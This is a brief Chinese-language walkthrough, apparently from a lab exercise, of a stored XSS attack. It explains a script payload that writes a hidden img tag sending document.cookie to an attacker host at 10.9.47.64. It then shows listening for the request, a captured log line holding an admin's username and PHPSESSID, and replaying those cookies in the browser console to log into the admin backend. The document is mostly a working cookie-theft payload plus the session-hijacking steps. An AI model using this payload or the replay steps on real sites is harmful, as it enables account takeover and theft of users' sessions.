写入 xss 代码
这段代码是一个 JavaScript 脚本,它包含在
<script>
标签中。让我们逐行解释这段代码的含义:
<script>
: 这是 HTML 中用于包含 JavaScript 代码的标签。
document.write(...)
: 这是一个 JavaScript 方法,用于将指定的内容写入到文档中。在这段代码中,它将会写入一段 HTML 代码。
<img src="http://10.9.47.64/'+document.cookie+'" width=0 height=0 border=0/>
: 这是一个<img>
标签,用于在网页中显示图像。src
属性指定了图像的 URL,它的值是一个字符串拼接操作。在这里,http://10.9.47.64/
是图像的 URL 的基础部分,而document.cookie
是 JavaScript 的一个内置属性,用于获取当前网页的 Cookie。通过将这两部分拼接起来,将会生成一个完整的图像 URL。整体来说,这段代码的目的是将当前网页的 Cookie 发送到
http://10.9.47.64/
。
<script>document.write(\'<img src=\"http://10.9.47.64/\'+document.cookie+\'\"width=0 height=0 border=0/>\')\;</script>
攻击机开启端口监听等待
等待管理员访问后台后,获得 cookie 信息
"GET /username=admin;%20userid=1;%20PHPSESSID=7ambb6qqaovrkud61e98ldb6m4 HTTP/1.1" 404 -
document.cookie = “username=admin”
document.cookie = “userid=1”
document.cookie = “PHPSESSID=7ambb6qqaovrkud61e98ldb6m4”
控制台输入,直接登录后台